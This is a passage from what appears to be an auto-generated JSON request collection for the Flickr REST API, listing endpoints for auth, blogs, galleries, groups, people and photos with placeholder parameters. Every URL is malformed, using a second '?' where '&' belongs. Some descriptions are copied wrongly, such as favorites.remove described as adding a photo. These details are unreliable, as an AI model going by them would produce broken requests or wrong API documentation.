"fd182ad9-35d3-4898-be85-f1e85eb3308a", "name": "getRestMethodFlickr.auth.gettoken", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.auth.getToken?api_key=%7B%7D&format=%7B%7D&frob=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns the auth token for the given frob, if one has been attached. This method call must be signed, and is deprecated in favour of OAuth." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "f7ddc7e1-4065-4c85-9f36-232acf29f741" } ] }, { "id": "cdbd5fdb-c700-4b09-830a-f57d877c31d1", "name": "getRestMethodFlickr.auth.oauth.getaccesstoken", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.auth.oauth.getAccessToken?api_key=%7B%7D&format=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Exchange an auth token from the old Authentication API, to an OAuth access token. Calling this method will delete the auth token used to make the request. The request must be signed." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "fcb6a746-503a-4460-84a6-4e2451e74d78" } ] } ] }, { "name": "Blogs", "item": [ { "id": "5795e72e-d4d4-4f96-8a76-2ded7a4cdd27", "name": "getRestMethodFlickr.blogs.getlist", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.blogs.getList?api_key=%7B%7D&format=%7B%7D&service=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Get a list of configured blogs for the calling user." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "82906ab5-c815-410c-9942-656aaefdb1b5" } ] }, { "id": "8f0db2bc-5830-4c3a-8165-f7f0b7eb7a5c", "name": "getRestMethodFlickr.blogs.getservices", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.blogs.getServices?api_key=%7B%7D&format=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns a list of Flickr supported blogging services." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "3147dd6b-fab7-4af8-a72d-dc82dd1a84f2" } ] }, { "id": "fd5705d5-a3f7-4975-8305-caf03a60174f", "name": "getRestMethodFlickr.blogs.addphoto", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.blogs.postPhoto?api_key=%7B%7D&blog_id=%7B%7D&blog_password=%7B%7D&description=%7B%7D&format=%7B%7D&photo_id=%7B%7D&service=%7B%7D&title=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Posts a photo to a blog." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "991ab726-0f08-4277-8ae7-49ec7126acac" } ] } ] }, { "name": "Collections", "item": [ { "id": "d6855211-9aff-4069-9fa9-7bc175555c48", "name": "getRestMethodFlickr.collections.getinfo", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.collections.getInfo?api_key=%7B%7D&collection_id=%7B%7D&format=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns information for a single collection. Currently can only be called by the collection owner, this may change." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "a4e99d82-2318-4366-bc22-6e4b8ced7b89" } ] }, { "id": "0dfec424-e020-4d05-88ad-9bb68acdf2a8", "name": "getRestMethodFlickr.collections.gettree", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.collections.getTree?api_key=%7B%7D&collection_id=%7B%7D&format=%7B%7D&user_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns a tree (or sub tree) of collections belonging to a given user." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "a6732d66-20d6-402b-ab34-c54227db0579" } ] } ] }, { "name": "Commons", "item": [ { "id": "3fb09fb6-1075-435f-bfce-177f67d10eb4", "name": "getRestMethodFlickr.commons.getinstitutions", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.commons.getInstitutions?api_key=%7B%7D&format=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Retrieves a list of the current Commons institutions." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "b0000129-2e26-433a-be70-7d91ec073d74" } ] } ] }, { "name": "Contacts", "item": [ { "id": "1a18a749-ea56-45a4-9ef4-95fed0d535ca", "name": "getRestMethodFlickr.contacts.getlist", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.contacts.getList?api_key=%7B%7D&filter=%7B%7D&format=%7B%7D&page=%7B%7D&per_page=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Get a list of contacts for the calling user." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "c0f1a118-ac2f-4e55-bd29-ddf1e334902e" } ] }, { "id": "2c606431-d6ad-4972-8f6f-ee64bb05b4a9", "name": "getRestMethodFlickr.contacts.getlistrecentlyuploaded", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.contacts.getListRecentlyUploaded?api_key=%7B%7D&date_lastupload=%7B%7D&filter=%7B%7D&format=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Return a list of contacts for a user who have recently uploaded photos along with the total count of photos uploaded. This method is still considered experimental. We don't plan for it to change or to go away but so long as this notice is present you should write your code accordingly." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "fd7d24bb-b911-407b-b55e-45509044462c" } ] }, { "id": "ecb0775f-4583-457b-9589-8bfa747b8a40", "name": "getRestMethodFlickr.contacts.getpubliclist", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.contacts.getPublicList?api_key=%7B%7D&format=%7B%7D&page=%7B%7D&per_page=%7B%7D&user_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Get the contact list for a user." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "18ec8214-ca4f-49a8-9921-391da57013a7" } ] } ] }, { "name": "Favorites", "item": [ { "id": "4f2231d2-5b61-4b81-b506-085191127f3c", "name": "getRestMethodFlickr.favorites.add", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.favorites.add?api_key=%7B%7D&format=%7B%7D&photo_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Adds a photo to a user's favorites list." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "ab6f384b-0fd3-4acd-8e9c-d4da9099932f" } ] }, { "id": "5b3b9879-3492-4247-a269-6193a2f301a8", "name": "getRestMethodFlickr.favorites.getlist", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.favorites.getList?api_key=%7B%7D&extras=%7B%7D&format=%7B%7D&max_fave_date=%7B%7D&min_fave_date=%7B%7D&page=%7B%7D&per_page=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns a list of the user's favorite photos. Only photos which the calling user has permission to see are returned." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "9e7a2596-db51-4708-9c8d-c81915f7ae9d" } ] }, { "id": "5baeee02-d6c8-4f0d-a916-981734ddc039", "name": "getRestMethodFlickr.favorites.getpubliclist", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.favorites.getPublicList?api_key=%7B%7D&extras=%7B%7D&format=%7B%7D&max_fave_date=%7B%7D&min_fave_date=%7B%7D&page=%7B%7D&per_page=%7B%7D&user_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns a list of favorite public photos for the given user." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "fe6233cd-e272-41b3-822b-54616b167477" } ] }, { "id": "64b6160e-2bb7-47c6-974d-f0b63e102a30", "name": "getRestMethodFlickr.favorites.remove", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.favorites.remove?api_key=%7B%7D&format=%7B%7D&photo_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Adds a photo to a user's favorites list." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "8a730440-e516-4330-a3e2-e0c604ae1845" } ] } ] }, { "name": "Galleries", "item": [ { "id": "96a618b4-e9f4-4553-989e-636ffde17961", "name": "postRestMethodFlickr.galleries.addphoto", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.galleries.addPhoto?api_key=%7B%7D&comment=%7B%7D&gallery_id=%7B%7D&photo_id=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Add a photo to a gallery." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "ce0ffa80-59c8-4306-af73-2b38a3ef1ec7" } ] }, { "id": "f0cab5c7-d2c9-452d-9dd2-9f7c248ef4d2", "name": "postRestMethodFlickr.galleries.create", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.galleries.create?api_key=%7B%7D&description=%7B%7D&format=%7B%7D&primary_photo_id=%7B%7D&title=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Create a new gallery for the calling user." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "1ce366b3-6c65-4381-846f-ab435facdcf1" } ] }, { "id": "0006b709-6d15-491b-b2f8-5d85cf661f7f", "name": "postRestMethodFlickr.galleries.editmeta", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.galleries.editMeta?api_key=%7B%7D&description=%7B%7D&gallery_id=%7B%7D&title=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Modify the metadata for a gallery." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "10420db2-7c59-4d25-bbe8-e69b1aeaf4bf" } ] }, { "id": "81f6bcec-f869-4315-b132-91bf43f1c5b0", "name": "postRestMethodFlickr.galleries.editphoto", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.galleries.editPhoto?api_key=%7B%7D&comment=%7B%7D&gallery_id=%7B%7D&photo_id=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Edit the comment for a gallery photo." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "5a1c972c-ac26-41a5-b197-bc14a18f11a8" } ] }, { "id": "64c9fb1d-4115-420f-987f-fffe12244422", "name": "postRestMethodFlickr.galleries.editphotos", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.galleries.editPhotos?api_key=%7B%7D&gallery_id=%7B%7D&photo_ids=%7B%7D&primary_photo_id=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Modify the photos in a gallery. Use this method to add, remove and re-order photos." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "dfa7b33b-4b0a-418b-ac64-e28af8bb610a" } ] }, { "id": "88749119-c7c1-467a-8e53-a6945616b3e3", "name": "getRestMethodFlickr.galleries.getinfo", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.galleries.getInfo?api_key=%7B%7D&format=%7B%7D&gallery_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns information about a gallery." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "7ee77724-0e54-4690-a962-aead476454b9" } ] }, { "id": "1f780090-73f8-4d8d-891b-62abd8c01ebf", "name": "getRestMethodFlickr.galleries.getlist", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.galleries.getList?api_key=%7B%7D&format=%7B%7D&page=%7B%7D&per_page=%7B%7D&user_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Return the list of galleries created by a user. Sorted from newest to oldest." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "74f23869-f928-4a1f-b4f5-fd0e2046efbd" } ] }, { "id": "829c945b-b177-47ae-95d7-de6dece45c92", "name": "getRestMethodFlickr.galleries.getlistforphoto", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.galleries.getListForPhoto?api_key=%7B%7D&format=%7B%7D&page=%7B%7D&per_page=%7B%7D&photo_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Return the list of galleries to which a photo has been added. Galleries are returned sorted by date which the photo was added to the gallery." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "0ce99647-1927-4b0b-a5cd-75d39b585bf0" } ] }, { "id": "a262a685-9820-4f21-8aac-fbc88ca4f638", "name": "getRestMethodFlickr.galleries.getphotos", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.galleries.getPhotos?api_key=%7B%7D&extras=%7B%7D&format=%7B%7D&gallery_id=%7B%7D&page=%7B%7D&per_page=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Return the list of photos for a gallery." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "e6bbf510-dde0-4ef7-bdf0-372edf8f167d" } ] } ] }, { "name": "Groups", "item": [ { "id": "f3e5301a-eb91-4236-a160-89380e1811bc", "name": "getRestMethodFlickr.groups.browse", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.groups.browse?api_key=%7B%7D&cat_id=%7B%7D&format=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Browse the group category tree, finding groups and sub-categories." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "1fa804ab-362e-4154-a7b4-7b01d93ba869" } ] }, { "id": "9f91bc8b-c3e2-4911-84f0-e3704e1e6d28", "name": "getRestMethodFlickr.groups.getinfo", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.groups.getInfo?api_key=%7B%7D&format=%7B%7D&group_id=%7B%7D&lang=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Get information about a group." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "03bb9097-13cd-4965-bb8b-5b2cd211c99b" } ] }, { "id": "2496bdac-06e3-4d38-b9e5-cf6a2c9a5ff9", "name": "getRestMethodFlickr.groups.search", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.groups.search?api_key=%7B%7D&format=%7B%7D&page=%7B%7D&per_page=%7B%7D&text=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Search for groups. 18+ groups will only be returned for authenticated calls where the authenticated user is over 18." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "3ebcf76b-6f08-4e75-9cb9-8fe2b304dcd8" } ] }, { "id": "a7431c59-e48b-4451-a6ba-06baf8612d2b", "name": "getRestMethodFlickr.groups.members.getlist", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.groups.members.getList?api_key=%7B%7D&format=%7B%7D&group_id=%7B%7D&membertypes=%7B%7D&page=%7B%7D&per_page=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Get a list of the members of a group. The call must be signed on behalf of a Flickr member, and the ability to see the group membership will be determined by the Flickr member's group privileges." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "63d77e7f-0218-4ed4-a595-d10330bd7aad" } ] }, { "id": "1bea1974-957e-4bd7-9941-4da3b0228df7", "name": "postRestMethodFlickr.groups.pools.add", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.groups.pools.add?api_key=%7B%7D&group_id=%7B%7D&photo_id=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Add a photo to a group's pool." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "ebb4462e-0dc4-448a-a0ec-bc7c27c09493" } ] }, { "id": "ee3e0e09-0788-437c-a017-78996f7d5745", "name": "getRestMethodFlickr.groups.pools.getcontext", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.groups.pools.getContext?api_key=%7B%7D&format=%7B%7D&group_id=%7B%7D&photo_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns next and previous photos for a photo in a group pool." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "cc91ad02-af8b-4627-b95b-fd573eb598ce" } ] }, { "id": "75827cca-610e-42d2-b0fc-4c51e9a720e2", "name": "getRestMethodFlickr.groups.pools.getgroups", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.groups.pools.getGroups?api_key=%7B%7D&format=%7B%7D&page=%7B%7D&per_page=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns a list of groups to which you can add photos." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "e6e46f16-2a72-4eaf-afbf-cc06cfee3222" } ] }, { "id": "3f5583f8-6b22-4394-aef2-810ec0142659", "name": "getRestMethodFlickr.groups.pools.getphotos", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.groups.pools.getPhotos?api_key=%7B%7D&extras=%7B%7D&format=%7B%7D&page=%7B%7D&per_page=%7B%7D&tags=%7B%7D&user_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns a list of pool photos for a given group, based on the permissions of the group and the user logged in (if any)." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "b80a7545-4396-4439-99c5-cb2e1074ff3c" } ] }, { "id": "c85927aa-479f-48db-aee3-428c33d9e6a2", "name": "postRestMethodFlickr.groups.pools.remove", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.groups.pools.remove?api_key=%7B%7D&group_id=%7B%7D&photo_id=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Remove a photo from a group pool." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "67d934d5-81bc-4028-8d91-b1acec27f4fb" } ] } ] }, { "name": "Interestingness", "item": [ { "id": "d81072ed-c4a4-4510-b4ad-b6dada0b953e", "name": "getRestMethodFlickr.interestingness.getlist", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.interestingness.getList?api_key=%7B%7D&date=%7B%7D&extras=%7B%7D&format=%7B%7D&page=%7B%7D&per_page=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns the list of interesting photos for the most recent day or a user-specified date." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "67313c25-62d0-4206-a007-a234e710b829" } ] } ] }, { "name": "Machinetags", "item": [ { "id": "aaa2cbe9-05fe-431f-8a92-21371757ffeb", "name": "getRestMethodFlickr.machinetags.getnamespaces", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.machinetags.getNamespaces?api_key=%7B%7D&format=%7B%7D&page=%7B%7D&per_page=%7B%7D&predicate=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Return a list of unique namespaces, optionally limited by a given predicate, in alphabetical order." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "b1f1a731-ad34-4030-a44f-f9bb1d7cf33a" } ] }, { "id": "426b93d2-04f9-4f69-87e3-9f2412294ef5", "name": "getRestMethodFlickr.machinetags.getpairs", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.machinetags.getPairs?api_key=%7B%7D&format=%7B%7D&namespace=%7B%7D&page=%7B%7D&per_page=%7B%7D&predicate=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Return a list of unique namespace and predicate pairs, optionally limited by predicate or namespace, in alphabetical order." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "28d8bdb2-0bc6-434c-9348-e9ca0dc1c56e" } ] }, { "id": "abf31548-4b35-4b79-aa6e-8773b6e96e3d", "name": "getRestMethodFlickr.machinetags.getpredicates", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.machinetags.getPredicates?api_key=%7B%7D&format=%7B%7D&namespace=%7B%7D&page=%7B%7D&per_page=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Return a list of unique predicates, optionally limited by a given namespace." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "69ad231a-288f-4926-b307-2348ee7cc9ca" } ] }, { "id": "d67a5f56-ed28-4a59-b31b-88708558a685", "name": "getRestMethodFlickr.machinetags.getrecentvalues", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.machinetags.getRecentValues?api_key=%7B%7D&format=%7B%7D&namespace=%7B%7D&page=%7B%7D&per_page=%7B%7D&predicate=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Fetch recently used (or created) machine tags values." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "ce188a9a-8785-4653-a7e8-4a586cbd577b" } ] }, { "id": "b58eceed-27c6-4a4d-963b-ab845e1a47c7", "name": "getRestMethodFlickr.machinetags.getvalues", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.machinetags.getValues?api_key=%7B%7D&format=%7B%7D&namespace=%7B%7D&page=%7B%7D&per_page=%7B%7D&predicate=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Return a list of unique values for a namespace and predicate." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "e8193033-e024-4f4c-b01a-c77938ef84e7" } ] } ] }, { "name": "Panda", "item": [ { "id": "d46c0503-fc28-4815-b791-d2d0730bdbd8", "name": "getRestMethodFlickr.panda.getlist", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.panda.getList?api_key=%7B%7D&format=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Return a list of Flickr pandas, from whom you can request photos using the flickr.panda.getPhotos API method. More information about the pandas can be found on the dev blog." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "faa4a2ed-873c-44e3-9d19-fd615785e442" } ] }, { "id": "b66572ed-8413-4c0b-9a74-e0b34e8ecaa3", "name": "getRestMethodFlickr.panda.getphotos", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.panda.getPhotos?api_key=%7B%7D&extras=%7B%7D&format=%7B%7D&page=%7B%7D&panda_name=%7B%7D&per_page=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Ask the Flickr Pandas for a list of recent public (and \"safe\") photos. More information about the pandas can be found on the dev blog." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "3b9e6f75-dcaf-4d33-be00-16e86486fe0e" } ] } ] }, { "name": "People", "item": [ { "id": "4b9e5475-a5b9-4c5d-8f2a-fe4c82aeb4e6", "name": "getRestMethodFlickr.people.findbyemail", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.people.findByEmail?api_key=%7B%7D&find_email=%7B%7D&format=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Return a user's NSID, given their email address" }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "e9ee5361-2585-4876-a391-90449f29b330" } ] }, { "id": "c947ce7f-d32f-4f0d-b962-12bbd1b3904f", "name": "getRestMethodFlickr.people.findbyusername", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.people.findByUsername?api_key=%7B%7D&format=%7B%7D&username=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Return a user's NSID, given their username." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "cf212954-912b-49fd-9308-bf868c8c5516" } ] }, { "id": "26b71ea5-e0e4-46be-8916-f38415f2c03b", "name": "getRestMethodFlickr.people.getinfo", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.people.getInfo?api_key=%7B%7D&format=%7B%7D&user_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Get information about a user." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "2769b047-3966-4b72-9249-ce9a1650b2db" } ] }, { "id": "fb8e16bf-d3d6-42eb-992e-17b20bf052b9", "name": "getRestMethodFlickr.people.getphotos", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.people.getPhotos?api_key=%7B%7D&content_type=%7B%7D&extras=%7B%7D&format=%7B%7D&max_taken_date=%7B%7D&max_upload_date=%7B%7D&min_taken_date=%7B%7D&min_upload_date=%7B%7D&page=%7B%7D&per_page=%7B%7D&privacy_filter=%7B%7D&safe_search=%7B%7D&user_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Return photos from the given user's photostream. Only photos visible to the calling user will be returned. This method must be authenticated; to return public photos for a user, use flickr.people.getPublicPhotos." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "91ad473e-d99d-4fd6-a400-b51ffad9febf" } ] }, { "id": "2f3bf8bc-9a5e-4ead-a660-1c3277e26be9", "name": "getRestMethodFlickr.people.getphotosof", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.people.getPhotosOf?api_key=%7B%7D&extras=%7B%7D&format=%7B%7D&owner_id=%7B%7D&page=%7B%7D&per_page=%7B%7D&user_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns a list of photos containing a particular Flickr member." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "e554dccc-ec46-46b1-9d9b-52c522eb656d" } ] }, { "id": "0c9795be-6430-458c-ace0-7f623522861b", "name": "getRestMethodFlickr.people.getpublicgroups", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.people.getPublicGroups?api_key=%7B%7D&format=%7B%7D&user_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns the list of public groups a user is a member of." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "9a3c8d02-58eb-437a-94df-95fc53c906bb" } ] }, { "id": "6977b269-fe00-4684-8581-f0707e134d00", "name": "getRestMethodFlickr.people.getpublicphotos", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.people.getPublicPhotos?api_key=%7B%7D&extras=%7B%7D&format=%7B%7D&page=%7B%7D&per_page=%7B%7D&safe_search=%7B%7D&user_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Get a list of public photos for the given user." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "e848a0fd-ba40-4c70-805f-c8f97d83ea0f" } ] }, { "id": "1c4187b0-1951-4f79-b903-24c502845d98", "name": "getRestMethodFlickr.people.getuploadstatus", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.people.getUploadStatus?api_key=%7B%7D&format=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns information for the calling user related to photo uploads." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "4430a3ae-2d3a-4f9d-be83-29958eba7a71" } ] } ] }, { "name": "Photos", "item": [ { "id": "8742132d-ea3f-4df4-90a2-d25ce8f2af8d", "name": "postRestMethodFlickr.photos.addtags", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.addTags?api_key=%7B%7D&photo_id=%7B%7D&tags=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Add tags to a photo." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "ec50925e-144f-45a8-ab76-a27cf56b1f23" } ] }, { "id": "00e13daa-364f-4e92-8c6e-e25b7b8739bb", "name": "postRestMethodFlickr.photos.delete", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.delete?api_key=%7B%7D&photo_id=%7B%7D", "method": "POST", "body": { "mode": "raw" }, "description": "Delete a photo from Flickr." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "43f75995-d6f2-4a25-907d-7ab4042a9e21" } ] }, { "id": "fb44018a-83cb-4974-97d0-142080c59c7c", "name": "getRestMethodFlickr.photos.getallcontexts", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getAllContexts?api_key=%7B%7D&format=%7B%7D&photo_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns all visible sets and pools the photo belongs to." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "440d4f1f-a8a1-43c1-9c93-5f60cb008dd1" } ] }, { "id": "1e56b3d5-588f-4f9e-bf5e-d7a9f05717c3", "name": "getRestMethodFlickr.photos.getcontactsphotos", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getContactsPhotos?api_key=%7B%7D&count=%7B%7D&extras=%7B%7D&format=%7B%7D&include_self=%7B%7D&just_friends=%7B%7D&single_photo=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Fetch a list of recent photos from the calling users' contacts." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "3e3745d6-f65b-4f3a-b9a7-f132e671ad46" } ] }, { "id": "e311ea76-39d8-465f-b658-840dd48a4e3c", "name": "getRestMethodFlickr.photos.getcontactspublicphotos", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getContactsPublicPhotos?api_key=%7B%7D&count=%7B%7D&extras=%7B%7D&format=%7B%7D&include_self=%7B%7D&just_friends=%7B%7D&single_photo=%7B%7D&user_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Fetch a list of recent public photos from a users' contacts." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "4445f23c-cd5a-407e-9053-ea64eb5918b7" } ] }, { "id": "6b987d6b-d679-4dcb-8833-e1c89c3363fa", "name": "getRestMethodFlickr.photos.getcontext", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getContext?api_key=%7B%7D&format=%7B%7D&photo_id=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns next and previous photos for a photo in a photostream." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "5af68bfa-7ea4-46b3-a875-cdbeb72c057e" } ] }, { "id": "f18b12a8-f268-4edc-b288-6b79c61acf56", "name": "getRestMethodFlickr.photos.getcounts", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getCounts?api_key=%7B%7D&dates=%7B%7D&format=%7B%7D&taken_dates=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Returns next and previous photos for a photo in a photostream." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "1d332c3f-b741-4d41-a988-e0f443feded3" } ] }, { "id": "2f1a16cb-ef1a-4945-a6c8-e512cf264494", "name": "getRestMethodFlickr.photos.getexif", "request": { "url": "http://api.flickr.com/services/rest/?method=flickr.photos.getExif?api_key=%7B%7D&format=%7B%7D&photo_id=%7B%7D&secret=%7B%7D", "method": "GET", "body": { "mode": "raw" }, "description": "Retrieves a list of EXIF/TIFF/GPS tags for a given photo. The calling user must have permission to view the photo." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "446c8384-2dc0-4645-aa7b-518736b7074a" } ] }, { "id": "3d4f8236-178a-463e-8d80-6b7b07011092", "name": "getRestMethodFlickr.photos.getfavorites", "request": { "url": 